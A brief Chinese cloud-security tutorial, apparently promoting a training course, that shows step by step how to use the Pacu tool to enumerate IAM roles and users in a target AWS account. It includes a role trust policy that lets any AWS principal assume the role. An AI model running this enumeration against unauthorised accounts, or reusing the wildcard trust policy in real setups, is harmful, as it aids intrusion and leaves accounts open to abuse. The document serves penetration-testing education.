国内云安全培训请点击原文或访问以下链接
https://www.yuque.com/u8047536/supvqp/ri4ft0
前提是已经获取了相关的密钥
步骤 1:将 AWS CLI配置为访问凭证
命令:
aws configure
步骤 2:创建包含以下内容的 JSON 角色策略文件,并将其命名为
assume-role-doc.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow", "Principal": {
"AWS": "*"
},
"Action": "sts:AssumeRole", "Condition": {}
}
]
}
步骤 3:使用伪造的策略,使用AWS CLI 在 AWS 账户上创建角色
命令:
aws iam create-role --role-name a4 --assume-role-policy-document file://assume-role-doc.json
步骤 5:安装 PACU
命令:
git clone https://github.com/RhinoSecurityLabs/pacu cd pacu
bash install.sh
注意:如果遇到有关 boto3 和 botocore 不兼容的任何错误,请使用此'pip3 install boto3' 单独安装 boto3。
步骤 5:启动 PACU
命令:
python3 pacu.py
步骤 6: 输入任何会话名称
步骤 7:在pacu中设置 AWS 访问凭证。使用任何别名并输入已经拥有的密钥
命令:
set_keys
步骤 8:列出 pacu 模块
命令:
list
步骤 9:下载name.txt,并且添加 “ad-” 前缀
命令
curl https://raw.githubusercontent.com/jeswinMathai/wordlist/main/names.txt -o names.txt sed -i 's/^/ad-/g' names.txt
cat names.txt
注意:根据需要将路径更改为“name.txt”
步骤 10:运行pacu模块来枚举角色
命令
run iam enum_roles --role-name a4 --account-id 2XXXXXXXXX2 --word-list /home/Lxxx/names.txt
已成功检索目标 AWS账户 上的角色。
步骤 11: 运行pacu模块来枚举用户
命令
run iam enum_users --role-name a4 --account-id 2XXXXXXXX2 --word-list/home/Lxxxx/names.txt
已成功检索目标 AWS 账户上的用户
1. AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)
2. PACU(https://github.com/RhinoSecurityLabs/pacu)